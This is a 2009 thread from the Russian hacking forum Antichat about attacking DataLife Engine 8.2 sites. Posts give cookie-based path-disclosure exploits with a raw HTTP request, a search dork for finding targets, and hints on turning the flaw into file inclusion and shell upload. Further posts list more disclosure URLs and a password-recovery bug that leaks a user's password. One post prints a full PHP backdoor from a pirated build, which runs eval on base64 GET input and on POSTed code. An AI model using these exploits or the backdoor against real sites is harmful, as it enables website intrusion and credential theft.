Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.10.2009, 21:41
|
|
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547
Репутация:
93
|
|
Сообщение от (Dm)
Может register_globals = Off
я на разных сайтах смотрел
wildshaman предположил что Эта бага есть только у версий,с качанных с сайта http://dlecms.com
как по другому моно замутить
|
|
|
17.10.2009, 17:50
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Раскрытие путей + LFI
DataLife Engine <= 8.2
Тип: Раскрытие путей
Автор: mailbrush
Версия: DataLife Engine <= 8.2
Описание: Уязвимость заключается в отсутствии фильтрации входного параметра "dle_skin" в файле init.php и позволяет удалённому пользователю добиться вывода ошибки функции, соответственно увидев пути к корню сайта.
Уязвимый код:
/engine/init.php
PHP код:
...
} elseif (isset($_COOKIE['dle_skin']) AND $_COOKIE['dle_skin'] != '') {
if (@is_dir(ROOT_DIR.'/templates/'.$_COOKIE['dle_skin']))
{
$config['skin'] = $_COOKIE['dle_skin'];
}
}
...
$tpl->dir = ROOT_DIR.'/templates/'.$config['skin'];
...
include_once $tpl->dir.'/login.tpl';
Эксплуатация:
- Заходим на сайт DLE. Открываем браузером менеджер куки. Изменяем / добавляем параметр, название которого ставим и значение
- Отправляем запрос на сайт:
Код:
GET / HTTP/1.1
Host: dle-news.ru
Cookie: dle_skin=../
Cookie2: $Version=1
Connection: Close
- Самый простой вариант - используем мой скрипт:
Код:
http://mailbrush.eu/tools/dle.php
После этого на сайте видим ошибку:
Warning: include_once([PATH]): failed to open stream: No such file or directory in [PATH] on line 314
Warning: include_once(): Failed opening '[PATH]' for inclusion (include_path='.;C:\php5\pear') in [PATH] on line 314
Невозможно загрузить шаблон: shortstory.tpl
[PATH] - это и есть раскрытие путей.
Соображающие люди поймут как сделать из этого LFI.
Дорк:
Код:
Powered by DataLife Engine
Последний раз редактировалось mailbrush; 08.02.2010 в 18:31..
|
|
|
|
18.10.2009, 16:20
|
|
Новичок
Регистрация: 11.11.2007
Сообщений: 17
Провел на форуме:
64705
Репутация:
6
|
|
mailbrush
Круто.
Ухты! Можно даже залить шелл если в uploads/files залить свой login.tpl
указывать dle_skin=../uploads/files/
|
|
|
|
18.10.2009, 23:31
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Раскрытие путей
DataLife Engine 8.2 Без всяких куков
1)файл preview.php
PHP код:
require_once ROOT_DIR.'/engine/classes/templates.class.php';
самое прикрльное что ROOT_DIR читает как папку, хотя многие в асе написали что
константа *в не понятках*
вызываем этот файл:
http://dle/engine/inc/preview.php
получаем
Warning: require_once(ROOT_DIR/engine/classes/templates.class.php) [function.require-once]: failed to open stream: No such file or directory in C:\AppServ\www\upload33\engine\inc\preview.php on line 2
на офф сайте даже канает)
+ 2)еще ругается с файла Init.php
PHP код:
require_once (ENGINE_DIR . '/inc/include/functions.inc.php');
extract( $_REQUEST, EXTR_SKIP );
require_once (ENGINE_DIR . '/data/config.php');
http://dle/engine/inc/include/init.php
Warning: require_once(ENGINE_DIR/inc/include/functions.inc.php) [function.require-once]: failed to open stream: No such file or directory in /home/public_html/engine/inc/include/init.php on line 18
+3) нужны куки 
engine/ajax/antivirus.php
PHP код:
if (isset( $_COOKIE['selected_language'] )) {
$_COOKIE['selected_language'] = totranslit( $_COOKIE['selected_language'], false, false );
if (@is_dir ( ROOT_DIR . '/language/' . $_COOKIE['selected_language'] )) {
$selected_language = $_COOKIE['selected_language'];
}
}
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';
все тоже самое что и у mailbrush'a. только в куках имя selected_language и значение ../ уже выдаст ошибку
+4) самое бональное раскрытие
engine/modules/imagepreview.php
PHP код:
$_GET['image'] = htmlspecialchars ($_GET['image'], ENT_QUOTES);
$_GET['image'] = str_replace( "document.cookie", "", $_GET['image'] );
$_GET['image'] = str_replace( "javascript", "", $_GET['image'] );
http://dle/engine/modules/imagepreview.php?image[]=
PS и не нужны куки здесь)
Зыы ну почти не нужны
Последний раз редактировалось HAXTA4OK; 19.10.2009 в 08:03..
|
|
|
|
05.11.2009, 00:54
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744
Репутация:
246
|
|
Народ есть способы залить шел через админку в dle 8.2 ???
|
|
|
|
05.11.2009, 06:49
|
|
Новичок
Регистрация: 11.11.2007
Сообщений: 17
Провел на форуме:
64705
Репутация:
6
|
|
Мэилбраш же вон написал способ. Только так вроде.
|
|
|
|
05.11.2009, 10:31
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744
Репутация:
246
|
|
Был найден бэкдор в нулле от -=ZLOY=-
В этом файле был бэкдор. eval() через $_POST
Файл лежит в (/engine/ajax/updates.php)
Код бэкдора
PHP код:
if($_GET['wert']==''){
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];
@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);
if (!strlen($data)) echo $lang['no_update']; else echo $data;
}else{
$file=(ROOT_DIR."/engine/classes/mysql.class.php");
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/dbconfig.php");
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/config.php");
if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";}
eval(base64_decode($_GET['user_id']));
echo <<<HTML
<HTML><body><form action="" method="post">
<center><textarea name="text" rows="10" cols="100"></textarea>
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>
HTML;
if($_POST['text']!=''){eval(stripcslashes($_POST['text']));
}}
Последний раз редактировалось S0ulVortex; 06.11.2009 в 17:31..
|
|
|
|
12.11.2009, 19:07
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624
Репутация:
114
|
|
Найдена уязвимость в DLE 8.2(Только в этой версии)
/index.php?do=lostpassword&douser=1&lostid=
Получаем пас от пользователя с id 1
На офф сайте уже доступна заплатка.
В новых версиях дле даже можно версию узнать ))
engine/skins/images/logos.jpg
Теперь у каждой версии в админки стоит версия в лого )
Это просто шикарно )
Последний раз редактировалось EST a1ien; 12.11.2009 в 19:21..
|
|
|
|
13.11.2009, 14:50
|
|
Banned
Регистрация: 16.06.2009
Сообщений: 115
Провел на форуме:
486953
Репутация:
62
|
|
Проблемму с лостпассворд профиксили. dle.org7.ru
|
|
|
|
15.11.2009, 02:55
|
|
Banned
Регистрация: 16.06.2009
Сообщений: 115
Провел на форуме:
486953
Репутация:
62
|
|
Еще одна бага есть. можн залить шелл с помощю категорий. создаете категорию туда свой шаблон с шеллом. вродь до 7.2 у мя пахало
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
